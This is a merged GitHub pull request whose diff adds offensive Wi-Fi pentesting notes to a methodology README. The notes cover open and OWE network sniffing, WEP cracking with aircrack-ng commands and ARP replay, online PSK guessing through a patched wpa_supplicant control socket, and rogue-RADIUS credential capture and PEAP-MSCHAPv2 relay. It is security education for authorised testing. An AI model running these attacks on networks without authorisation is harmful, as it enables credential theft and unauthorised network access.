Skip to content

Wireless-(in)Fidelity Pentesting Wi-Fi in 2025 #1760

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
carlospolop merged 1 commit into from
Jan 23, 2026
+78 −1
Merged

Wireless-(in)Fidelity Pentesting Wi-Fi in 2025 #1760

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
79 changes: 78 additions & 1 deletion src/generic-methodologies-and-resources/pentesting-wifi/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -108,6 +108,26 @@ This tool automates **WPS/WEP/WPA-PSK** attacks. It will automatically:
- **+ Open** -- Useful to capture captive portal creds and/or perform LAN attacks
- **+ WPA** -- Useful to capture WPA handshakes

## Open / OWE networks quick notes

- **Passive capture** on open SSIDs still works with monitor mode and tcpdump:

```bash
iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap
```

- **OWE** (Opportunistic Wireless Encryption) performs a per-station key exchange (no PSK), so air frames are encrypted even on "open" SSIDs. Being WPA3-based, it also enforces **802.11w PMF**, which blocks spoofed deauth/disassoc frames.
- OWE **does not authenticate** joiners: anyone can associate, so **verify client isolation** instead of trusting marketing claims. Without isolation, ARP spoofing or responder-style poisoning on the local L2 still works.
- **Evil Twin** remains feasible on open/OWE SSIDs by presenting a stronger signal; PMF just removes the deauth shortcut. If victims accept a forged TLS cert, full HTTP(S) MitM is regained.
- Broadcast poisoning on open guest Wi-Fi easily yields creds/hashes (LLMNR/NBT-NS/mDNS). See:

{{#ref}}
../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
{{#endref}}

## DOS

### Deauthentication Packets
Expand Down Expand Up @@ -283,7 +303,22 @@ All the proposed WPS attacks can be easily performed using _**airgeddon.**_

## **WEP**

So broken and unused nowdays. Just know that _**airgeddon**_ have a WEP option called "All-in-One" to attack this kind of protection. More tools offer similar options.
**Why it collapses**

- RC4 seed is just **IV (24 bits) + shared key**. The IV is cleartext, tiny (2^24), and repeats quickly, so ciphertexts with the same IV reuse the keystream.
- XORing two ciphertexts with the same keystream leaks `PlaintextA ⊕ PlaintextB`; predictable headers + RC4 KSA biases (**FMS**) let you “vote” key bytes. **PTW** optimises this using ARP traffic to drop requirements to tens of thousands of packets instead of millions.
- Integrity is only **CRC32** (linear/unkeyed), so an attacker can flip bits and recompute CRC32 without the key → packet forgery/replay/ARP injection while waiting for IVs.

Practical break is deterministic:

```bash
airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap # PTW attack recovers key once IV threshold is met
```

Airgeddon still ships an "All-in-One" WEP workflow if you prefer a guided UI.

![](<../../images/image (432).png>)

Expand Down Expand Up @@ -402,6 +437,36 @@ apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze
```

#### Faster online PSK guessing via `wpa_supplicant` ctrl socket (no clients/PMKID)

When no clients are around and the AP refuses PMKID, you can iterate PSKs online without respawning supplicants:

- Patch `wpa_supplicant.c` to force `dur = 0;` in the auth failure backoff logic (around `ssid->auth_failures`), effectively disabling the temporary-disable timer.
- Run a single daemon with a control socket:

```bash
# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1

wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf
```

- Drive it via the control interface, reusing the same scan and network:

```text
ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED
```

A small Python loop reading socket events (`CTRL-EVENT-CONNECTED` / `CTRL-EVENT-DISCONNECTED`) can test ~100 guesses in ~5 minutes without scan overhead. It is still noisy and detectable, but avoids per-attempt process restarts and backoff delays.

## **WPA Enterprise (MGT)**

In **enterprise WiFi setups, you'll encounter various authentication methods**, each providing different security levels and management features. When you use tools like `airodump-ng` to inspect network traffic, you might notice identifiers for these authentication types. Some common methods include:
Expand Down Expand Up @@ -714,6 +779,16 @@ Or you could also use:
- `--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP` to specify manually the methods offered (offering the same auth methods in the same order as the organisation the attack will be much more difficult to detect).
- [Find more info in the wiki](http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/)

#### When clients skip RADIUS certificate validation (PEAP/TTLS)

- If devices are configured with "do not validate certificate", a cloned AP + rogue RADIUS (`eaphammer --cert-wizard --creds --auth wpa-eap`) will collect **NetNTLMv2** (PEAP-MSCHAPv2) or **cleartext** creds (PEAP-GTC). `bettercap` deauth (`wifi.deauth <BSSID>`) both reveals hidden SSIDs during probes and forces reconnects, unless PMF/802.11w blocks spoofed deauth.
- Cracked NetNTLMv2 gives reusable Wi‑Fi/AD creds; GTC yields immediate plaintext.

#### Relaying PEAP-MSCHAPv2 instead of cracking (wpa_sycophant + hostapd-mana)

- For machine accounts with uncrackable random passwords, abuse **MSCHAPv2 relay**: run `hostapd-mana` as the Evil Twin, forwarding the MSCHAPv2 exchange to `wpa_sycophant`, which simultaneously connects to the legitimate AP. Successful relay grants authenticated Wi‑Fi without recovering the password.
- Use builds that support the target security level (WPA3/PMF requires recent hostapd/wpa_supplicant); PMF prevents deauth coercion, so wait for voluntary client associations.

**Using Airgeddon**

`Airgeddon` can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to **capture the user and the MD5 of the password**. Later, the attacker can try to crack the password.\
Expand Down Expand Up @@ -851,6 +926,8 @@ These methods, particularly PIN entry, are susceptible to the same vulnerabiliti
- [The vulnerability that killed FreeWifi_Secure](https://7h30th3r0n3.fr/the-vulnerability-that-killed-freewifi_secure/)
- [RFC 4186 – EAP-SIM Authentication](https://datatracker.ietf.org/doc/html/rfc4186)
- [3GPP TS 33.402 – 3GPP system architecture evolution (SAE); Security aspects of non-3GPP accesses](https://www.3gpp.org/ftp/Specs/archive/33_series/33.402/)
- [Wireless-(in)Fidelity: Pentesting Wi-Fi in 2025 (Synacktiv)](https://www.synacktiv.com/en/publications/wireless-infidelity-pentesting-wi-fi-in-2025.html)
- [PEAP relay attacks with wpa_sycophant (SensePost)](https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/)


TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
Expand Down